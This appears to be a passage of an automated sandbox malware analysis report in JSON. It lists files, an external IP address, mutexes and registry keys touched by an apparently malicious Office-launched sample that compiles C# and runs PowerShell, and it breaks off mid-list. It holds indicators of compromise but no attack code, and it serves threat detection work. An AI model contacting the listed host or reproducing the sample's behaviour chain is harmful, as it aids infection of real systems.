{ "analysis_details": { "creation_time": "2017-10-24 19:37 (UTC+2)", "execution_successful": true, "number_of_processes": 10, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:38" }, "artifacts": { "files": [ { "filename": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop\\Logo.cs", "hashes": [ { "md5_hash": "667a8968a36880dc4147d2ce00c64b30", "sha1_hash": "48233228f9babdd3bcac5b85d5ae258f91204f7e", "sha256_hash": "8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\desktop\\logo.cs", "operations": [ "read", "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs", "hashes": [ { "md5_hash": "3992ea6c0751d769815a98c4cffcadce", "sha1_hash": "6ba244d7eb6a6facd2b4c4e946e26987d2336e8b", "sha256_hash": "b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.0.cs", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline", "hashes": [ { "md5_hash": "8d42a6a6ddda3cb8546ef4cb888dbfa8", "sha1_hash": "2024365b4311bc93867119ceee7c876683fef607", "sha256_hash": "f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.cmdline", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out", "hashes": [ { "md5_hash": "51bfb6f473aa25324ee1ed9830ca806e", "sha1_hash": "f1fae130030df5b4dff15ed820ca35665886ea98", "sha256_hash": "60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.out", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.err", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.pdb", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.pdb", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop\\__Sn.cs", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop\\__sn.cs", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\com\\SOAPAssembly", "hashes": [], "norm_filename": "c:\\windows\\system32\\com\\soapassembly", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\com", "hashes": [], "norm_filename": "c:\\windows\\system32\\com", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows", "hashes": [], "norm_filename": "c:\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\winword.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz", "hashes": [], "norm_filename": "c:\\users\\aetadzjz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\result.exex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\taskkill.exe", "hashes": [], "norm_filename": "c:\\windows\\system32\\taskkill.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "185.211.244.133", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PageSetup", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], 